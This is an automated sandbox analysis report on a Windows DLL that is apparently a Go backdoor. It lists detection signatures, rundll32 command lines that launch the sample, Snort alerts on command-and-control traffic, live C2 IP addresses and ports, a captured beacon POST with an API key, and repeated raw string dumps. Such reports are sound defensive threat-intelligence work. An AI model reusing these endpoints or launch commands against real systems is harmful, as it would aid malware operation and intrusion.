Edit tour

Windows Analysis Report
file.dll

Overview

General Information

Sample name:file.dll
Analysis ID:1473486
MD5:e6743e380f2418b616dca113dbbc93cb
SHA1:6c051a6d3a183c24292d6821865a5a183b4ebb9c
SHA256:eb7183f807b13b4524393b8da4cc242d96283a13ecd7331db1fcefd43986d0c9
Tags:dll
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Found Tor onion address
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Switches to a custom stack to bypass stack traces
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Entry point lies outside standard sections
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE / OLE file has an invalid certificate
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • loaddll32.exe (PID: 4128 cmdline: loaddll32.exe "C:\Users\user\Desktop\file.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 5824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3500 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\file.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 1216 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 6580 cmdline: rundll32.exe C:\Users\user\Desktop\file.dll,MainFunc MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 6292 cmdline: rundll32.exe C:\Users\user\Desktop\file.dll,_cgo_dummy_export MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 6516 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",MainFunc MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 1276 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",_cgo_dummy_export MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
Timestamp:07/15/24-12:52:56.229033
SID:2855536
Source Port:49770
Destination Port:20529
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:07/15/24-12:53:25.827998
SID:2855538
Source Port:20529
Destination Port:49770
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:07/15/24-12:52:56.228835
SID:2855539
Source Port:20529
Destination Port:49770
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:07/15/24-12:53:25.610445
SID:2855537
Source Port:49770
Destination Port:20529
Protocol:TCP
Classtype:A Network Trojan was detected

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: file.dllReversingLabs: Detection: 13%
Source: file.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED, DLL
Source: file.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Networking

barindex
Source: TrafficSnort IDS: 2855539 ETPRO TROJAN Unknown Golang Backdoor CnC Server Response M2 185.231.155.234:20529 -> 192.168.2.5:49770
Source: TrafficSnort IDS: 2855536 ETPRO TROJAN Unknown Golang Backdoor CnC Client Request M1 192.168.2.5:49770 -> 185.231.155.234:20529
Source: TrafficSnort IDS: 2855537 ETPRO TROJAN Unknown Golang Backdoor CnC Client Request M2 192.168.2.5:49770 -> 185.231.155.234:20529
Source: TrafficSnort IDS: 2855538 ETPRO TROJAN Unknown Golang Backdoor CnC Server Response M1 185.231.155.234:20529 -> 192.168.2.5:49770
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 77.238.229.63 80Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 195.2.70.38 80Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 77.238.224.56 80Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 91.142.74.28 80Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.231.155.234 20529Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 77.238.250.123 80Jump to behavior
Source: rundll32.exe, 00000004.00000002.3937101477.000000006B56B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdquitnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatntohsarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: hangupGetACPsendtoremote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswindowswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTabortedCopySidFreeSidSleepExWSARecvWSASendsignal refused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetestht
Source: rundll32.exe, 00000005.00000002.3937025141.000000006B56B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdquitnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatntohsarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: hangupGetACPsendtoremote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswindowswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTabortedCopySidFreeSidSleepExWSARecvWSASendsignal refused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetestht
Source: rundll32.exe, 00000006.00000002.2137128012.000000006B56B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdquitnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatntohsarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: hangupGetACPsendtoremote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswindowswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTabortedCopySidFreeSidSleepExWSARecvWSASendsignal refused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetestht
Source: rundll32.exe, 00000007.00000002.3937735108.000000006B56B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdquitnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatntohsarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: hangupGetACPsendtoremote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswindowswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTabortedCopySidFreeSidSleepExWSARecvWSASendsignal refused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetestht
Source: rundll32.exe, 00000008.00000002.2200538127.000000006B56B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdquitnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatntohsarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: hangupGetACPsendtoremote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswindowswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTabortedCopySidFreeSidSleepExWSARecvWSASendsignal refused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetestht
Source: global trafficTCP traffic: 192.168.2.5:49770 -> 185.231.155.234:20529
Source: Joe Sandbox ViewIP Address: 91.142.74.28 91.142.74.28
Source: Joe Sandbox ViewIP Address: 77.238.229.63 77.238.229.63
Source: Joe Sandbox ViewIP Address: 195.2.70.38 195.2.70.38
Source: Joe Sandbox ViewASN Name: VTSL1-ASRU VTSL1-ASRU
Source: Joe Sandbox ViewASN Name: VDSINA-ASRU VDSINA-ASRU
Source: Joe Sandbox ViewASN Name: TELERU-ASRU TELERU-ASRU
Source: Joe Sandbox ViewASN Name: VDSINA-ASRU VDSINA-ASRU
Source: Joe Sandbox ViewASN Name: TELERU-ASRU TELERU-ASRU
Source: unknownTCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknownTCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknownTCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknownTCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknownTCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknownTCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknownTCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknownTCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknownTCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknownTCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknownTCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknownTCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknownTCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknownTCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknownTCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknownTCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknownTCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknownTCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknownTCP traffic detected without corresponding DNS query: 77.238.224.56
Source: unknownTCP traffic detected without corresponding DNS query: 77.238.224.56
Source: unknownTCP traffic detected without corresponding DNS query: 77.238.224.56
Source: unknownTCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknownTCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknownTCP traffic detected without corresponding DNS query: 77.238.224.56
Source: unknownTCP traffic detected without corresponding DNS query: 77.238.224.56
Source: unknownTCP traffic detected without corresponding DNS query: 77.238.224.56
Source: unknownTCP traffic detected without corresponding DNS query: 77.238.224.56
Source: unknownTCP traffic detected without corresponding DNS query: 77.238.224.56
Source: unknownTCP traffic detected without corresponding DNS query: 77.238.229.63
Source: unknownTCP traffic detected without corresponding DNS query: 77.238.229.63
Source: unknownTCP traffic detected without corresponding DNS query: 77.238.229.63
Source: unknownTCP traffic detected without corresponding DNS query: 77.238.224.56
Source: unknownTCP traffic detected without corresponding DNS query: 77.238.224.56
Source: unknownTCP traffic detected without corresponding DNS query: 77.238.229.63
Source: unknownTCP traffic detected without corresponding DNS query: 77.238.229.63
Source: unknownTCP traffic detected without corresponding DNS query: 77.238.229.63
Source: unknownTCP traffic detected without corresponding DNS query: 77.238.229.63
Source: unknownTCP traffic detected without corresponding DNS query: 77.238.229.63
Source: unknownTCP traffic detected without corresponding DNS query: 77.238.250.123
Source: unknownTCP traffic detected without corresponding DNS query: 77.238.250.123
Source: unknownTCP traffic detected without corresponding DNS query: 77.238.250.123
Source: unknownTCP traffic detected without corresponding DNS query: 77.238.250.123
Source: unknownTCP traffic detected without corresponding DNS query: 77.238.250.123
Source: unknownTCP traffic detected without corresponding DNS query: 77.238.250.123
Source: unknownTCP traffic detected without corresponding DNS query: 77.238.229.63
Source: unknownTCP traffic detected without corresponding DNS query: 77.238.229.63
Source: unknownTCP traffic detected without corresponding DNS query: 77.238.250.123
Source: unknownTCP traffic detected without corresponding DNS query: 77.238.250.123
Source: unknownTCP traffic detected without corresponding DNS query: 77.238.250.123
Source: unknownTCP traffic detected without corresponding DNS query: 77.238.250.123
Source: unknownHTTP traffic detected: POST / HTTP/1.1Host: 195.2.70.38User-Agent: Go-http-client/1.1Content-Length: 158X-Api-Key: 7MBMBL3aAccept-Encoding: gzipData Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Source: rundll32.exe, 00000007.00000002.3931954299.000000000D464000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3934146478.000000000D663000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3934146478.000000000D60C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3931954299.000000000D414000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3931954299.000000000D45A000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3932978999.000000000D4BE000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3934146478.000000000D598000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://195.2.70.38
Source: rundll32.exe, 00000007.00000002.3934146478.000000000D598000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://195.2.70.38Go-http-client/1.1PM
Source: rundll32.exe, 00000004.00000002.3932131837.000000000D012000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3934227145.000000000D90C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://195.2.70.38P
Source: rundll32.exe, 00000004.00000002.3932131837.000000000D140000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3932347032.000000000D808000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3934227145.000000000D90C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3931954299.000000000D414000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3932978999.000000000D4BE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://195.2.70.38PM
Source: rundll32.exe, 00000004.00000002.3932131837.000000000D012000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://195.2.70.38http://91.142.74.28G
